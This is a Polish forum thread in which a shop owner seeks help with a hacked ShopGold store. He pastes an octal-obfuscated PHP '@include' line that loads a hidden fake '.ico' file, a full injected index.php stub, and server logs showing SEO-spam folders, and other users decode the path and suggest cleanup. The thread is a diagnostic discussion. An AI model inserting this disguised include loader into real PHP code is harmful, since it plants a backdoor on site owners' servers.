Witam serdecznie,
Ostatnio mam problem na serwerze nazwa. Mamy postawiony sklep i pierwsze co się dzieje:
1. Tworzą się jakieś dziwne foldery na ftp typu: xjrsap, charmed-das,
2. Dopisywana jest komenda do plików index.php na serwerze nad znacznikiem header np.
""@include"\057hom\145/se\162ver\066872\0654/f\164p/m\151gra\143ja/\153mbc\056hom\145.pl\057pub\154ic_\150tml\057son\141rsk\154ep.\160l/t\143pdf\057inc\154ude\057bar\143ode\163/.2\062c2e\0612b.\151co""
3. Zmieniałem hasło do FTP ale nic to nie daje, podejrzewam że jest jakiś wirus który dopisuje skrypt, nie znam się na tyle na php.
Do tej pory edytowałem wszystkie pliki index.php i usunąłem dziwny kod, dzisiaj od nowa jest dopisany.
Łącze się tylko z jednego komputera z FTP, kaspersky skanuje mi codziennie kompa. Pomoc z hostingu rozkłada ręce. Po prostu mi ręce opadają.
Jakieś podpowiedzi?
Pełna wersja: Dopisywanie kodu do plików php
Ktoś z użytkowników zapamiętuje hasło do ftp w programie 
a to można bardzo łatwo wykraść z komputera.
Mówisz Kaspersky? Ha Ha
Nie zapamiętuj haseł do ftp a plik generujący te kody pewnie gdzieś siedzi w czeluściach oprogramowania.
To gotowy skrypt sklepu? Jaki silnik?
a to można bardzo łatwo wykraść z komputera.Mówisz Kaspersky? Ha Ha
Nie zapamiętuj haseł do ftp a plik generujący te kody pewnie gdzieś siedzi w czeluściach oprogramowania.
To gotowy skrypt sklepu? Jaki silnik?
Sklep jest na oprogramowaniu shopgold, nie ma nikt hasła zapisanego bo go zmieniłem 2 razy już i tylko ja się loguje bez zapisywania hasła. Nie wiem co można zrobić w tym temacie. Nie mogę namierzyć tego pliku :/
Przeglądam logi serwera i jest np.
183.91.78.211 - - [24/Apr/2021:05:51:47 +0200] "POST /zx32ub/index.php HTTP/1.0" 200 133 "http://cake.nazwasklepu.pl/zx32ub/index.php" "Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36" ams1
207.46.13.109 - - [24/Apr/2021:05:51:47 +0200] "GET /irish-state-vvuux/eee2fe-man-utd-vs-newcastle-results-history HTTP/2.0" 404 10028 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" sea1
Np. mam taki folder z tą nazwą: irish-state-vvuux oraz zx32ub.
Przeglądam logi serwera i jest np.
183.91.78.211 - - [24/Apr/2021:05:51:47 +0200] "POST /zx32ub/index.php HTTP/1.0" 200 133 "http://cake.nazwasklepu.pl/zx32ub/index.php" "Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36" ams1
207.46.13.109 - - [24/Apr/2021:05:51:47 +0200] "GET /irish-state-vvuux/eee2fe-man-utd-vs-newcastle-results-history HTTP/2.0" 404 10028 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" sea1
Np. mam taki folder z tą nazwą: irish-state-vvuux oraz zx32ub.
Proponuje poczytac chocby to
https://semcore.pl/jak-znalezc-zlosliwy-kod...e-internetowej/
https://www.artefakt.pl/blog/seo/witryna-zo...-dzialac-szybko
Najprawdopodobnie wlam jest poprzez sam skrypt
https://semcore.pl/jak-znalezc-zlosliwy-kod...e-internetowej/
https://www.artefakt.pl/blog/seo/witryna-zo...-dzialac-szybko
Najprawdopodobnie wlam jest poprzez sam skrypt
Może to coś pomoże, po zdekodowaniu jest to:
@include"/home/server687254/ftp/migracja/kmbc.home.pl/public_html/sonarsklep.pl/tcpdf/include/barcodes/.22c2e12b.ico
@include"/home/server687254/ftp/migracja/kmbc.home.pl/public_html/sonarsklep.pl/tcpdf/include/barcodes/.22c2e12b.ico
Cytat(gino @ 24.04.2021, 18:31:20 ) 
Może to coś pomoże, po zdekodowaniu jest to:
@include"/home/server687254/ftp/migracja/kmbc.home.pl/public_html/sonarsklep.pl/tcpdf/include/barcodes/.22c2e12b.ico
@include"/home/server687254/ftp/migracja/kmbc.home.pl/public_html/sonarsklep.pl/tcpdf/include/barcodes/.22c2e12b.ico
Właśnie znalazłem jakąś stronke do dekodowania php, może to mnie zaprowadzi do plików, dzięki za wskazówkę
A ktoś mi wytłumaczy czy taki plik o nazwie index.php z takim kodem jest potrzebny? Są utworzone każdym katalogu. Kod nad header jest podejrzewam wstrzyknięty jakoś.
<?php
/*a9645*/
@include "\057h\157m\145/\163e\162v\145r\0668\0672\0654\057f\164p\057m\151g\162a\143j\141/\153m\142c\056h\157m\145.\160l\057p\165b\154i\143_\150t\155l\057s\157n\141r\163k\154e\160.\160l\057t\143p\144f\057i\156c\154u\144e\057b\141r\143o\144e\163/\0562\062c\062e\0612\142.\151c\157";
/*a9645*/
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
header("Location: ../");
exit;
?>
Podejrzewam, że gdybyś otworzył ten plik w edytorze tekstu, to zobaczysz, że to jakiś kod php, a nie prawdziwy plik ico, tak podejrzewam. Ten sklep stoi na WordPressie?
Edit: zobacz jeszcze to:
blog.imunify360.com/malware-why-is-it-hard-to-remove
Edit: zobacz jeszcze to:
blog.imunify360.com/malware-why-is-it-hard-to-remove
Nie na wordpress. Dzisiaj rano znowu utworzone pliki index.php. Masakra jakaś po prostu już nie wiem, spróbuję zainstalować od nowa sklep. Musi być gdzieś plik który tworzy ten bałagan ale namierzyć go będzie ciężko.
Patrzyłem logi serwera i zawsze po restarcie około 1 w nocy mam takie coś:
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /javascript/jquery.js HTTP/2.0" 200 32330 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_rejestracja.png HTTP/2.0" 200 719 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_szukaj.png HTTP/2.0" 200 803 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_konto.png HTTP/2.0" 200 573 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_koszyk.png HTTP/2.0" 200 665 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
Ten folder oczywiście mam utworzony w katalogu głównym: transferwise-reddit-jmdtx jest tam plik index.php oraz folder cache...
Patrzyłem logi serwera i zawsze po restarcie około 1 w nocy mam takie coś:
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /javascript/jquery.js HTTP/2.0" 200 32330 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_rejestracja.png HTTP/2.0" 200 719 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_szukaj.png HTTP/2.0" 200 803 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_konto.png HTTP/2.0" 200 573 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_koszyk.png HTTP/2.0" 200 665 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
Ten folder oczywiście mam utworzony w katalogu głównym: transferwise-reddit-jmdtx jest tam plik index.php oraz folder cache...
Dalem Ci podpowiedz. Przeczytaj to co dalem. Ten skrypt jest jakis dziurawy. Wez sobie cos co ma najnowsze aktualizacje jakis inny skrypt i aktualizuj wtyczki ktore dodajesz bo przez wtyczki zostaje dodany kod najprawdopodobnie. Musi to byc skrypt ktory nie jest czesto aktualizowany i ma dziury. Wez sobie jakis Magento albo Presta najnowsze i czesto aktualizuj.
Ok, dzięki, czytałem to wszystko, mam pewien pomysł. znalazłem 3 pliki z rozszerzeniem .ico. Plików index.php jest ponad 600 utworzonych w ciągu 2 minut. Edytowanie tego zajmie trochę czasu.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.